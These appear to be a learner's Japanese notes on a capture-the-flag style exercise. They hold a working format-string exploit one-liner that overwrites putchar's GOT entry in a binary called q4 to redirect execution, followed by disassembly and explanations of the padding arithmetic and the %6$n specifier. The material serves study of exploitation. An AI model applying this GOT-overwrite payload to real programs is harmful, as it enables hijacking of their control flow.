echo -e "\xe0\x99\x04\x08%134514317x%6\$n" | ./q4


main
 80485fc:       e8 b3 fe ff ff          call   80484b4 <printf@plt>
 8048601:       c7 04 24 0a 00 00 00    mov    DWORD PTR [esp],0xa
 8048608:       e8 67 fe ff ff          call   8048474 <putchar@plt> ＊＊ここを変える
 804860d:       c7 84 24 18 04 00 00    mov    DWORD PTR [esp+0x418],0x1
 8048614:       01 00 00 00
～～～
 804868a:       0f 95 c0                setne  al
 804868d:       84 c0                   test   al,al
 804868f:       75 89                   jne    804861a <main+0x66>
 8048691:       c7 44 24 04 e6 87 04    mov    DWORD PTR [esp+0x4],0x80487e6 ＊＊この行まで飛ばす
 8048698:       08
 8048699:       c7 04 24 e8 87 04 08    mov    DWORD PTR [esp],0x80487e8
 80486a0:       e8 ff fd ff ff          call   80484a4 <fopen@plt>


<putchar@plt>:
 8048474:       ff 25 e0 99 04 08       jmp    DWORD PTR ds:0x80499e0 ＊＊ここから飛ばす
 804847a:       68 08 00 00 00          push   0x8
 804847f:       e9 d0 ff ff ff          jmp    8048454 <.plt>


0x80499e0 に 0x8048691 を入れる

8048691(hex) -> 134514321(dec)

134514321(dec)から4引いたものを挿入 <- ????
↑
頭の0の分4引いている

実行したら大量の空白 <- ????
↑
空白の文字数がスタックに存在しているアドレスのデータに代入する値になる

そもそもechoで指定している %6\$n って何？
オ何ー？
↑
スタックの6番目のアドレスを選択してデータを代入する的な感じのコード